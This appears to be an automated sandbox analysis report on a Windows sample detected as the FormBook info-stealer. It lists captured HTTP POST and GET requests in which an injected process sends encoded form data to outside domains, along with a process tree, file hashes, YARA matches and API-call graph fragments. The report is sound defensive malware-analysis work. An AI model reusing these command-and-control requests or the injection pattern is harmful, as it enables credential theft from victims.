                                Data Raw: 45 66 75 70 3d 35 51 58 35 4d 66 37 51 2b 42 64 74 58 46 53 65 5a 6b 4d 48 49 6c 2b 61 4f 6c 38 4b 34 5a 4d 61 62 31 59 53 46 4c 48 47 4f 31 6a 4f 39 6e 67 2b 49 56 73 50 33 59 37 6e 46 36 31 4b 2b 79 5a 65 42 68 56 62 78 59 47 6b 54 71 78 57 49 4d 70 78 78 49 61 62 65 75 72 30 56 2f 4d 2f 36 61 4a 6f 49 4a 36 64 31 58 33 56 56 74 4a 78 65 6c 45 43 4e 57 64 4c 4d 42 52 4f 6b 34 4c 63 32 77 64 57 50 43 6a 57 77 32 39 36 58 48 54 50 4f 5a 4e 6f 2b 56 31 31 36 44 49 76 4a 2b 35 76 78 2b 53 4d 6b 78 38 62 6f 4d 72 58 4c 4b 6d 70 41 42 2f 5a 48 61 5a 75 42 51 4c 58 4b 64 42 56 45 46 6c 48 6d 6a 4c 4b 53 4e 39 66 71 59 47 43 4c 57 71 7a 6d 6a 71 33 43 6c 7a 55 78 78 4d 7a 6a 66 4a 74 78 6e 77 34 7a 56 62 6e 4c 74 54 58 44 43 2f 76 4a 51 36 46 32 31 34 59 6e 74 75 69 47 38 31 77 41 62 6d 46 6f 53 6f 4e 53 6f 62 49 36 53 32 71 6d 56 6b 71 44 42 59 44 46 34 51 58 5a 35 36 4b 4d 50 42 37 65 41 68 6c 31 6e 6c 41 64 69 66 53 79 64 34 62 58 30 69 61 62 6a 6e 4d 69 4f 74 72 38 56 52 79 35 6c 2b 46 48 32 62 6c 51 [TRUNCATED]
                                Data Ascii: Efup=5QX5Mf7Q+BdtXFSeZkMHIl+aOl8K4ZMab1YSFLHGO1jO9ng+IVsP3Y7nF61K+yZeBhVbxYGkTqxWIMpxxIabeur0V/M/6aJoIJ6d1X3VVtJxelECNWdLMBROk4Lc2wdWPCjWw296XHTPOZNo+V116DIvJ+5vx+SMkx8boMrXLKmpAB/ZHaZuBQLXKdBVEFlHmjLKSN9fqYGCLWqzmjq3ClzUxxMzjfJtxnw4zVbnLtTXDC/vJQ6F214YntuiG81wAbmFoSoNSobI6S2qmVkqDBYDF4QXZ56KMPB7eAhl1nlAdifSyd4bX0iabjnMiOtr8VRy5l+FH2blQZ05zorpDSKzFP7RGnsMBcnOTrY4QDheca3prOWX/T6uzJyPtEdkz249cg2RkgQXa+LQ4JD9rrtwhVIAY8vP4fVQ1n/IYljj7ZTtuwrdMKtXGc5npRgQipbTcDlAESkKTycZndaX2/WRJtxX80UmyR0OxHTq9+wxijhLF0bQmEUNg9FNBUA+SKmNhzDRzXhp5JPTo12Oz4yXlVqbIQN7CkqR6q++MuFbLnYM43To/CZD756bELAtOp22YcxOblbKf3RpFNPqq0963ynEMq2OvP6IxCmvgFpppmBFUgWBt+tvZlucvtYzN/BAaDmYQENrXMeBoQYd0Z9Gczgex1i1Xo8DdDBC7BU4esXhInWoLdD00WeRT8YZmFi9JMdiEl1kyjckrOc57EEiptIu51GBaehu7hAI5VRg/k0dtH0miEFuLmcYmankR64Q7pwtxDm4toY71uSHS8Kju9tDXhuTpRdAuKzjFSadhz/bjNF0z5EFFwFJ6UJnYgX66x1WzGeMihQTnpW1loowhM6POmTDhK8bgXJ8kr62M1Vm0nYBkAoKOGXnq6JLMCUgVRyu2Nq/Tl+ZNgSTtzt4hET9bAJPJfgRI2Z3/3GoMrwqXThQ8pLkAqY9Pv3MF2ovJSr7UuGduCx3lPNmrMw3VlNuVpzAAkCNJchbqASj4CO [TRUNCATED]
                                Jul 3, 2024 18:05:05.300086975 CEST1236INHTTP/1.1 200 OK
                                date: Wed, 03 Jul 2024 16:05:04 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1134
                                x-request-id: e86ee714-f8f4-4b8b-ad8f-3e2340fbd6e4
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vH0mpP00Vh2kUC5YMI8bd9++udiLpP9KDWDRmksthYJpM8tZA+UhQCkWrgl1QDXL7eHQ4ai2NNJB46r5huwZdA==
                                set-cookie: parking_session=e86ee714-f8f4-4b8b-ad8f-3e2340fbd6e4; expires=Wed, 03 Jul 2024 16:20:05 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 48 30 6d 70 50 30 30 56 68 32 6b 55 43 35 59 4d 49 38 62 64 39 2b 2b 75 64 69 4c 70 50 39 4b 44 57 44 52 6d 6b 73 74 68 59 4a 70 4d 38 74 5a 41 2b 55 68 51 43 6b 57 72 67 6c 31 51 44 58 4c 37 65 48 51 34 61 69 32 4e 4e 4a 42 34 36 72 35 68 75 77 5a 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vH0mpP00Vh2kUC5YMI8bd9++udiLpP9KDWDRmksthYJpM8tZA+UhQCkWrgl1QDXL7eHQ4ai2NNJB46r5huwZdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Jul 3, 2024 18:05:05.300261974 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTg2ZWU3MTQtZjhmNC00YjhiLWFkOGYtM2UyMzQwZmJkNmU0IiwicGFnZV90aW1lIjoxNzIwMDIyNz


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                28192.168.2.849742199.59.243.226805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:05:07.375452995 CEST349OUTGET /9tym/?Efup=0S/ZPq6i4295YU31CGsIF3+6CX49wr8UBlIPMbX3EHvT6GYfIlkKvIaQUZZ23gNfBRY92LbOf61zdN1D+KaxZKPZCNQTzZg2JqvKwBvhTNR6FU45NnpKZwAnu57SnFRcaQ==&5X=Wrl4wnYP HTTP/1.1
                                Host: www.mommysdaycare.net
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Jul 3, 2024 18:05:07.837610006 CEST1236INHTTP/1.1 200 OK
                                date: Wed, 03 Jul 2024 16:05:07 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1490
                                x-request-id: c639534c-8fa4-4041-9a1c-4c841fcef288
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mrjzBKQmYDVFwy0eyskODaEmgztsIaNZNNwTGiSu98ABoMp0Bqph1kIPBmgmSwpHjQG58fGZ39tcF//1xBC+Tw==
                                set-cookie: parking_session=c639534c-8fa4-4041-9a1c-4c841fcef288; expires=Wed, 03 Jul 2024 16:20:07 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 72 6a 7a 42 4b 51 6d 59 44 56 46 77 79 30 65 79 73 6b 4f 44 61 45 6d 67 7a 74 73 49 61 4e 5a 4e 4e 77 54 47 69 53 75 39 38 41 42 6f 4d 70 30 42 71 70 68 31 6b 49 50 42 6d 67 6d 53 77 70 48 6a 51 47 35 38 66 47 5a 33 39 74 63 46 2f 2f 31 78 42 43 2b 54 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mrjzBKQmYDVFwy0eyskODaEmgztsIaNZNNwTGiSu98ABoMp0Bqph1kIPBmgmSwpHjQG58fGZ39tcF//1xBC+Tw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                Jul 3, 2024 18:05:07.837707996 CEST943INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzYzOTUzNGMtOGZhNC00MDQxLTlhMWMtNGM4NDFmY2VmMjg4IiwicGFnZV90aW1lIjoxNzIwMDIyNz


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                29192.168.2.849743124.156.180.97805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:05:13.329483986 CEST612OUTPOST /siy1/ HTTP/1.1
                                Host: www.kwytruband.cloud
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.kwytruband.cloud
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 205
                                Referer: http://www.kwytruband.cloud/siy1/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 48 31 4c 31 65 44 70 76 75 34 50 74 4d 4f 79 2b 6e 7a 38 56 73 56 50 79 67 33 71 2f 61 42 66 7a 42 62 57 6e 61 72 62 4d 38 34 59 58 6d 2b 6a 4b 4d 7a 70 4c 59 70 5a 34 4d 74 37 38 68 58 4e 6e 43 56 6b 6e 56 6b 74 77 63 39 30 4b 66 62 4b 54 35 69 74 71 44 4c 7a 65 70 4a 35 51 6a 7a 46 66 6a 49 6b 46 49 77 76 52 4d 52 4b 36 51 69 4d 78 4a 76 4e 37 32 4a 39 70 41 4f 61 67 36 6e 36 62 49 53 69 70 4f 46 39 54 59 33 42 4d 79 46 4c 72 63 43 73 57 34 6a 71 6d 45 36 45 63 48 56 42 48 4e 4c 4f 6c 6e 4d 4d 46 77 35 77 6b 31 59 54 4c 66 38 49 74 54 55 64 34 45 42 33 34 30 51 53 53 61 54 4c 35 58 36 55 3d
                                Data Ascii: Efup=H1L1eDpvu4PtMOy+nz8VsVPyg3q/aBfzBbWnarbM84YXm+jKMzpLYpZ4Mt78hXNnCVknVktwc90KfbKT5itqDLzepJ5QjzFfjIkFIwvRMRK6QiMxJvN72J9pAOag6n6bISipOF9TY3BMyFLrcCsW4jqmE6EcHVBHNLOlnMMFw5wk1YTLf8ItTUd4EB340QSSaTL5X6U=


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                30192.168.2.849744124.156.180.97805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:05:16.879718065 CEST632OUTPOST /siy1/ HTTP/1.1
                                Host: www.kwytruband.cloud
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.kwytruband.cloud
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 225
                                Referer: http://www.kwytruband.cloud/siy1/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 48 31 4c 31 65 44 70 76 75 34 50 74 4f 75 69 2b 68 55 6f 56 70 31 50 78 35 48 71 2f 54 68 66 33 42 62 53 6e 61 76 69 58 38 71 38 58 6d 66 2f 4b 4e 79 70 4c 5a 70 5a 34 4c 64 37 39 6c 58 4d 70 43 56 6f 46 56 6d 35 77 63 39 51 4b 66 5a 53 54 35 54 74 74 43 62 7a 51 77 35 35 53 74 54 46 66 6a 49 6b 46 49 77 71 45 4d 56 6d 36 51 7a 63 78 59 36 68 38 6f 35 39 75 4a 75 61 67 6f 58 36 66 49 53 69 50 4f 42 38 49 59 30 35 4d 79 46 37 72 63 54 73 4a 6a 54 71 73 4b 61 46 63 4d 6c 5a 43 44 49 53 79 75 2f 4d 5a 36 34 74 59 35 4f 2b 68 46 65 41 72 51 55 31 54 45 43 66 4f 78 6e 50 36 41 77 62 4a 4a 74 43 47 6f 4a 31 4d 4b 6c 44 6a 66 75 6c 61 6d 76 46 4c 37 4a 4c 4d
                                Data Ascii: Efup=H1L1eDpvu4PtOui+hUoVp1Px5Hq/Thf3BbSnaviX8q8Xmf/KNypLZpZ4Ld79lXMpCVoFVm5wc9QKfZST5TttCbzQw55StTFfjIkFIwqEMVm6QzcxY6h8o59uJuagoX6fISiPOB8IY05MyF7rcTsJjTqsKaFcMlZCDISyu/MZ64tY5O+hFeArQU1TECfOxnP6AwbJJtCGoJ1MKlDjfulamvFL7JLM


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                31192.168.2.849745124.156.180.97805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:05:19.419594049 CEST1649OUTPOST /siy1/ HTTP/1.1
                                Host: www.kwytruband.cloud
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.kwytruband.cloud
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 1241
                                Referer: http://www.kwytruband.cloud/siy1/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 48 31 4c 31 65 44 70 76 75 34 50 74 4f 75 69 2b 68 55 6f 56 70 31 50 78 35 48 71 2f 54 68 66 33 42 62 53 6e 61 76 69 58 38 71 30 58 6e 74 33 4b 4d 52 78 4c 4c 5a 5a 34 49 64 37 67 6c 58 4d 6b 43 56 77 42 56 6d 31 47 63 2f 59 4b 66 36 61 54 2f 6e 35 74 4c 62 7a 51 74 4a 35 54 6a 7a 46 4b 6a 49 30 42 49 77 61 45 4d 56 6d 36 51 77 55 78 59 76 4e 38 71 35 39 70 41 4f 61 6b 36 6e 36 33 49 53 72 36 4f 42 78 39 59 6b 5a 4d 79 6c 72 72 66 68 45 4a 76 54 71 71 4a 61 46 79 4d 6c 6b 53 44 49 50 4c 75 38 51 6a 36 35 5a 59 37 5a 4b 39 66 38 41 4e 54 30 64 48 44 78 50 46 39 32 6a 64 4a 69 6a 49 4a 64 33 69 6f 4a 30 6b 41 43 37 76 53 50 63 75 36 62 5a 6f 71 35 6d 58 4e 35 78 58 64 2f 5a 79 4f 2b 36 76 42 4a 62 6d 34 55 61 4c 7a 42 79 69 51 7a 2f 43 67 34 79 71 6a 7a 2b 73 6d 6c 78 41 39 39 2f 46 74 58 61 50 49 34 61 37 42 54 77 61 2b 51 74 51 54 41 50 42 68 6b 2f 58 6c 77 4b 49 4a 4c 57 63 61 6d 33 45 66 65 71 4a 31 70 47 68 36 52 37 4f 66 72 39 39 65 68 4e 34 6d 49 7a 55 58 64 69 30 53 38 45 7a 55 [TRUNCATED]
                                Data Ascii: Efup=H1L1eDpvu4PtOui+hUoVp1Px5Hq/Thf3BbSnaviX8q0Xnt3KMRxLLZZ4Id7glXMkCVwBVm1Gc/YKf6aT/n5tLbzQtJ5TjzFKjI0BIwaEMVm6QwUxYvN8q59pAOak6n63ISr6OBx9YkZMylrrfhEJvTqqJaFyMlkSDIPLu8Qj65ZY7ZK9f8ANT0dHDxPF92jdJijIJd3ioJ0kAC7vSPcu6bZoq5mXN5xXd/ZyO+6vBJbm4UaLzByiQz/Cg4yqjz+smlxA99/FtXaPI4a7BTwa+QtQTAPBhk/XlwKIJLWcam3EfeqJ1pGh6R7Ofr99ehN4mIzUXdi0S8EzUw7R3RkX8mqDBviqWENUfuVxaSMlAxqBMskjGQu/UIZ1WUkZq44uKYsVN1gnLEJScs8Wy9nXWcT6eWAQojfICSyU2PCm2P2wfb7w9eBklSJ5dET/3v+2dVWWW0MGeHGAShoRxVjKgokRX/qEbKOYvVA+64eoducuEwDZOrRIZdDj9OnI46SBor8GToDe29r5+RNwdlpSRZeFzgFdq3L9dtL9gSa9Pg602mbWTEAAEL710Wmabq/wXXFVJoa6p5HNI9VIrcZXQC1NNDVup1zZnBYah/ZEXtHLLAdFyJ2RemUXJU5ew6hh5qOq+y7O7cxdU1PWbII0oxWWfH9HcXpXSvtkPpnqMsWKDz35sLXShpbQqI5dk118Bh9fEAvtvvdEbgnXXKr5A9mXXmgw76Tn8Siztwlx5TPpaSIwT7jhM/ug73Fzz7fZiTz+1ltXX8fuEtDMwH2NE8uxUHsuw+Sczsvjgg1vOEizjjtjw0bhwSk6N1f3hUCX5/Mz1gBMO9JvnTtFHImgEq27QGOnAFcuP/j6X9nXnaRokn2GZe28veFd9yTmtD1rPZMbfnvGYzDD20qCxBQha7NnXglmAyqgWIX7JLYGHSWrjPxQ+x/wZ4wDBXmwYdt+SM3b0KmbzER70A+Ln5ffBwxucYDsGQEVmHGnnfcTP/QnDX/ [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                32192.168.2.849746124.156.180.97805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:05:21.955975056 CEST348OUTGET /siy1/?Efup=K3jVd2QwvP/vE5bLqRwLiG/ouCi2dCf8HcrsXZX+iIcvtfjJNCMaZ4cNZ/78hy4DUFhEXV0DZOcTULe6zQ1rJbzjmaVovzYps5hxNWqkCnG6IikFfqhaq5tMJN6I5yDLJQ==&5X=Wrl4wnYP HTTP/1.1
                                Host: www.kwytruband.cloud
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:12:02:20
                                Start date:03/07/2024
                                Path:C:\Users\user\Desktop\CMV610942X6UI.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\CMV610942X6UI.exe"
                                Imagebase:0x540000
                                File size:997'376 bytes
                                MD5 hash:C9DD16AE393FC240BCF80FDA156E7F1A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:12:02:31
                                Start date:03/07/2024
                                Path:C:\Users\user\Desktop\CMV610942X6UI.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\CMV610942X6UI.exe"
                                Imagebase:0x400000
                                File size:997'376 bytes
                                MD5 hash:C9DD16AE393FC240BCF80FDA156E7F1A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:7
                                Start time:12:02:52
                                Start date:03/07/2024
                                Path:C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe"
                                Imagebase:0xce0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:8
                                Start time:12:02:54
                                Start date:03/07/2024
                                Path:C:\Windows\SysWOW64\systray.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\systray.exe"
                                Imagebase:0x400000
                                File size:9'728 bytes
                                MD5 hash:28D565BB24D30E5E3DE8AFF6900AF098
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:9
                                Start time:12:03:06
                                Start date:03/07/2024
                                Path:C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe"
                                Imagebase:0xce0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:12
                                Start time:12:03:18
                                Start date:03/07/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff6d20e0000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:10.1%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:2.7%
                                  Total number of Nodes:223
                                  Total number of Limit Nodes:13
                                  execution_graph 20206 c7d680 DuplicateHandle 20207 c7d716 20206->20207 20450 c7acb0 20451 c7acbf 20450->20451 20454 c7ada3 20450->20454 20462 c7ada8 20450->20462 20455 c7adb9 20454->20455 20456 c7addc 20454->20456 20455->20456 20470 c7b031 20455->20470 20474 c7b040 20455->20474 20456->20451 20457 c7add4 20457->20456 20458 c7afe0 GetModuleHandleW 20457->20458 20459 c7b00d 20458->20459 20459->20451 20463 c7adb9 20462->20463 20464 c7addc 20462->20464 20463->20464 20468 c7b031 LoadLibraryExW 20463->20468 20469 c7b040 LoadLibraryExW 20463->20469 20464->20451 20465 c7add4 20465->20464 20466 c7afe0 GetModuleHandleW 20465->20466 20467 c7b00d 20466->20467 20467->20451 20468->20465 20469->20465 20471 c7b054 20470->20471 20472 c7b079 20471->20472 20478 c7a168 20471->20478 20472->20457 20475 c7b054 20474->20475 20476 c7b079 20475->20476 20477 c7a168 LoadLibraryExW 20475->20477 20476->20457 20477->20476 20479 c7b220 LoadLibraryExW 20478->20479 20481 c7b299 20479->20481 20481->20472 20482 27f74a8 FindCloseChangeNotification 20483 27f750f 